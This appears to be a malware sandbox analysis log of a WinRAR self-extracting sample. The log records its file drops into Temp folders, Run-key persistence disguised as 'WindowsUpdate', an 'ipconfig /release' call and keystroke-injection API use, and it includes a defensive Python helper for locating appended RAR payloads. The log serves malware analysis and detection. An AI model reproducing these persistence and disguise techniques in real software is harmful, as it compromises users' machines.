                Source: C:\Users\user\Desktop\FX6KTgnipP.exe Section loaded: onecorecommonproxystub.dll
                Source: C:\Users\user\Desktop\FX6KTgnipP.exe Section loaded: onecoreuapcommonproxystub.dll
                Source: C:\Users\user\Desktop\FX6KTgnipP.exe Section loaded: pcacli.dll
                Source: C:\Users\user\Desktop\FX6KTgnipP.exe Section loaded: mpr.dll
                Source: C:\Users\user\Desktop\FX6KTgnipP.exe Section loaded: windows.fileexplorer.common.dll
                Source: C:\Users\user\Desktop\FX6KTgnipP.exe Section loaded: apphelp.dll
                Source: C:\Users\user\Desktop\FX6KTgnipP.exe Section loaded: ntshrui.dll
                Source: C:\Users\user\Desktop\FX6KTgnipP.exe Section loaded: cscapi.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: version.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sxs.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: vbscript.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: amsi.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: msasn1.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: rsaenh.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: cryptbase.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: msisip.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wshext.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: scrobj.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: mlang.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: mpr.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: scrrun.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: edputil.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: urlmon.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: windows.staterepositoryps.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: appresolver.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: bcp47langs.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: slc.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sppc.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: onecorecommonproxystub.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: onecoreuapcommonproxystub.dll
                Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2 Section loaded: wsock32.dll
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2 Section loaded: version.dll
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2 Section loaded: winmm.dll
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2 Section loaded: mpr.dll
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2 Section loaded: wininet.dll
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2 Section loaded: iphlpapi.dll
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2 Section loaded: userenv.dll
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2 Section loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2 Section loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2 Section loaded: sspicli.dll
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2 Section loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2 Section loaded: wldp.dll
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2 Section loaded: ntmarta.dll
                Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: iphlpapi.dll
                Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: dhcpcsvc.dll
                Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: dhcpcsvc6.dll
                Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: dnsapi.dll
                Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: iphlpapi.dll
                Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: dhcpcsvc.dll
                Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: dhcpcsvc6.dll
                Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: dnsapi.dll
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe Section loaded: wsock32.dll
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe Section loaded: version.dll
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe Section loaded: winmm.dll
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe Section loaded: mpr.dll
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe Section loaded: wininet.dll
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe Section loaded: iphlpapi.dll
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe Section loaded: userenv.dll
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe Section loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe Section loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe Section loaded: sspicli.dll
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe Section loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe Section loaded: wldp.dll
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe Section loaded: ntmarta.dll
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe Section loaded: wsock32.dll
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe Section loaded: version.dll
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe Section loaded: winmm.dll
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe Section loaded: mpr.dll
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe Section loaded: wininet.dll
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe Section loaded: iphlpapi.dll
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe Section loaded: userenv.dll
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe Section loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe Section loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe Section loaded: sspicli.dll
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe Section loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe Section loaded: wldp.dll
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe Section loaded: wsock32.dll
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe Section loaded: version.dll
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe Section loaded: winmm.dll
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe Section loaded: mpr.dll
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe Section loaded: wininet.dll
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe Section loaded: iphlpapi.dll
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe Section loaded: userenv.dll
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe Section loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe Section loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe Section loaded: sspicli.dll
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe Section loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\UserAccountControlSettings.exe Section loaded: wininet.dll
                Source: C:\Users\user\Desktop\FX6KTgnipP.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32
                Source: Window Recorder Window detected: More than 3 window changes detected
                Source: FX6KTgnipP.exe Static file information: File size 1330396 > 1048576
                Source: FX6KTgnipP.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: FX6KTgnipP.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: FX6KTgnipP.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: FX6KTgnipP.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: FX6KTgnipP.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: FX6KTgnipP.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: FX6KTgnipP.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                Source: FX6KTgnipP.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: FX6KTgnipP.exe
                Source: Binary string: UserAccountControlSettings.pdbGCTL source: RegSvcs.exe, 0000000E.00000002.2206467110.0000000001538000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000012.00000003.2166226808.0000000000DB4000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000012.00000003.2165340743.0000000000D9F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: UserAccountControlSettings.pdb source: RegSvcs.exe, 0000000E.00000002.2206467110.0000000001538000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000012.00000003.2166226808.0000000000DB4000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000012.00000003.2165340743.0000000000D9F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 0000000E.00000002.2206645455.0000000001990000.00000040.00001000.00020000.00000000.sdmp, UserAccountControlSettings.exe, 00000016.00000002.3768152114.0000000004960000.00000040.00001000.00020000.00000000.sdmp, UserAccountControlSettings.exe, 00000016.00000003.2261587798.00000000047B4000.00000004.00000020.00020000.00000000.sdmp, UserAccountControlSettings.exe, 00000016.00000003.2223900833.0000000004608000.00000004.00000020.00020000.00000000.sdmp, UserAccountControlSettings.exe, 00000016.00000002.3768152114.0000000004AFE000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 0000000E.00000002.2206645455.0000000001990000.00000040.00001000.00020000.00000000.sdmp, UserAccountControlSettings.exe, 00000016.00000002.3768152114.0000000004960000.00000040.00001000.00020000.00000000.sdmp, UserAccountControlSettings.exe, 00000016.00000003.2261587798.00000000047B4000.00000004.00000020.00020000.00000000.sdmp, UserAccountControlSettings.exe, 00000016.00000003.2223900833.0000000004608000.00000004.00000020.00020000.00000000.sdmp, UserAccountControlSettings.exe, 00000016.00000002.3768152114.0000000004AFE000.00000040.00001000.00020000.00000000.sdmp
                Source: FX6KTgnipP.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: FX6KTgnipP.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: FX6KTgnipP.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: FX6KTgnipP.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: FX6KTgnipP.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2 Code function: 7_2_00855D78 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 7_2_00855D78
                Source: C:\Users\user\Desktop\FX6KTgnipP.exe File created: C:\Users\user\AppData\Local\Temp\RarSFX0\__tmp_rar_sfx_access_check_5925140
                Source: FX6KTgnipP.exe Static PE information: section name: .didat
                Source: C:\Users\user\Desktop\FX6KTgnipP.exe Code function: 0_2_00266680 push ecx; ret 0_2_00266693
                Source: C:\Users\user\Desktop\FX6KTgnipP.exe Code function: 0_2_00265773 push ecx; ret 0_2_00265786
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2 Code function: 7_3_01192801 push cs; iretd 7_3_01192802
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2 Code function: 7_3_01192801 push cs; iretd 7_3_01192802
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2 Code function: 7_3_01192801 push cs; iretd 7_3_01192802
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2 Code function: 7_3_01192801 push cs; iretd 7_3_01192802
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2 Code function: 7_3_01192FCB push cs; retf 7_3_01192FE2
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2 Code function: 7_3_01192FCB push cs; retf 7_3_01192FE2
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2 Code function: 7_3_01192FCB push cs; retf 7_3_01192FE2
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2 Code function: 7_3_01192FCB push cs; retf 7_3_01192FE2
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2 Code function: 7_3_01192801 push cs; iretd 7_3_01192802
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2 Code function: 7_3_01192801 push cs; iretd 7_3_01192802
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2 Code function: 7_3_01192801 push cs; iretd 7_3_01192802
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2 Code function: 7_3_01192801 push cs; iretd 7_3_01192802
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2 Code function: 7_3_01192FCB push cs; retf 7_3_01192FE2
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2 Code function: 7_3_01192FCB push cs; retf 7_3_01192FE2
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2 Code function: 7_3_01192FCB push cs; retf 7_3_01192FE2
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2 Code function: 7_3_01192FCB push cs; retf 7_3_01192FE2
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2 Code function: 7_3_01192801 push cs; iretd 7_3_01192802
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2 Code function: 7_3_01192801 push cs; iretd 7_3_01192802
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2 Code function: 7_3_01192801 push cs; iretd 7_3_01192802
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2 Code function: 7_3_01192801 push cs; iretd 7_3_01192802
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2 Code function: 7_3_01192FCB push cs; retf 7_3_01192FE2
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2 Code function: 7_3_01192FCB push cs; retf 7_3_01192FE2
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2 Code function: 7_3_01192FCB push cs; retf 7_3_01192FE2
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2 Code function: 7_3_01192FCB push cs; retf 7_3_01192FE2
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2 Code function: 7_3_01192801 push cs; iretd 7_3_01192802
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2 Code function: 7_3_01192801 push cs; iretd 7_3_01192802
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2 Code function: 7_3_01192801 push cs; iretd 7_3_01192802
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2 Code function: 7_3_01192801 push cs; iretd 7_3_01192802
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2 Code function: 7_3_01192FCB push cs; retf 7_3_01192FE2
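The sfxrar.pdb path and the __tmp_rar_sfx_access_check file above mark the submitted sample as a WinRAR self-extracting stub, which carries its archive as data appended after the last PE section (the overlay). The Python below is an added triage helper written for this report, not code from Joe Sandbox or WinRAR: it walks the section table to find where the overlay begins, searches for the RAR4/RAR5 marker block, and reports whether the marker sits in the overlay (an appended archive, the SFX layout) or inside a section. The minimal PE it builds is constructed for the demonstration and is not the analysed file.

```python
"""Locate a RAR archive appended to a PE image, the layout a WinRAR SFX stub
uses. Added example; not Joe Sandbox output or WinRAR code."""
import struct

# RAR marker blocks from the RAR format: 7 bytes for RAR 1.5-4.x, 8 for RAR5.
RAR_MAGICS = {
    b"Rar!\x1a\x07\x01\x00": "RAR5",
    b"Rar!\x1a\x07\x00": "RAR4",
}


def pe_overlay_offset(data: bytes):
    """Offset where the overlay (bytes after the last section's raw data)
    starts, or None if the buffer is not a parseable PE image."""
    try:
        if data[:2] != b"MZ":
            return None
        e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
        if data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
            return None
        coff = e_lfanew + 4                          # COFF file header
        num_sections = struct.unpack_from("<H", data, coff + 2)[0]
        opt_size = struct.unpack_from("<H", data, coff + 16)[0]
        table = coff + 20 + opt_size                 # first section header
        end = 0
        for i in range(num_sections):
            # SizeOfRawData / PointerToRawData sit at +16 in each 40-byte header
            raw_size, raw_ptr = struct.unpack_from("<II", data, table + i * 40 + 16)
            end = max(end, raw_ptr + raw_size)
        return end
    except struct.error:
        return None


def find_rar_payload(data: bytes):
    """First RAR marker in the buffer, with its offset and whether it lies in
    the overlay (an appended archive, as an SFX stub carries) rather than
    inside a section (embedded data, a different packaging)."""
    hits = [(data.find(m), v) for m, v in RAR_MAGICS.items() if data.find(m) != -1]
    if not hits:
        return None
    pos, version = min(hits)
    overlay = pe_overlay_offset(data)
    return {"version": version, "offset": pos,
            "in_overlay": overlay is not None and pos >= overlay}


def build_sample(rar_in_overlay: bool = True) -> bytes:
    """Constructed minimal PE: one section of 0x200 bytes at file offset 0x200,
    so the overlay begins at 0x400. Fields the parser does not read are zero;
    this is not a runnable executable."""
    buf = bytearray(0x400)
    buf[0:2] = b"MZ"
    struct.pack_into("<I", buf, 0x3C, 0x40)                 # e_lfanew
    buf[0x40:0x44] = b"PE\x00\x00"
    struct.pack_into("<H", buf, 0x44 + 2, 1)                # NumberOfSections
    struct.pack_into("<H", buf, 0x44 + 16, 0)               # SizeOfOptionalHeader
    sect = 0x44 + 20
    buf[sect:sect + 8] = b".text\x00\x00\x00"
    struct.pack_into("<II", buf, sect + 16, 0x200, 0x200)   # SizeOfRawData, PointerToRawData
    archive = b"Rar!\x1a\x07\x01\x00" + b"\x00" * 32        # RAR5 marker + dummy bytes
    if rar_in_overlay:
        return bytes(buf) + archive
    buf[0x200:0x200 + len(archive)] = archive               # inside the section instead
    return bytes(buf)


if __name__ == "__main__":
    print(find_rar_payload(build_sample()))
```

Run it against a real file with `find_rar_payload(open(path, "rb").read())`; a marker at or past the overlay offset is the SFX case, while a marker inside a section points at an embedded archive that a different loader will unpack.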

                Persistence and Installation Behavior

                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /release
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe File created: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe.exe
                Source: C:\Users\user\Desktop\FX6KTgnipP.exe File created: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2 File created: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2.exe
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2 File created: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2 File created: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe
                Source: C:\Users\user\Desktop\FX6KTgnipP.exe File created: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2 File created: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2 Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run WindowsUpdate
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2 Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run WindowsUpdate
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WindowsUpdate
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WindowsUpdate
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2 Code function: 7_2_008E25A0 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 7_2_008E25A0
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2 Code function: 7_2_0086FC8A GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 7_2_0086FC8A
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe Code function: 15_2_003C25A0 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 15_2_003C25A0
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe Code function: 15_2_0034FC8A GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 15_2_0034FC8A
                Source: C:\Users\user\Desktop\FX6KTgnipP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Process information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Process information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Process information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Process information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Process information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\UserAccountControlSettings.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
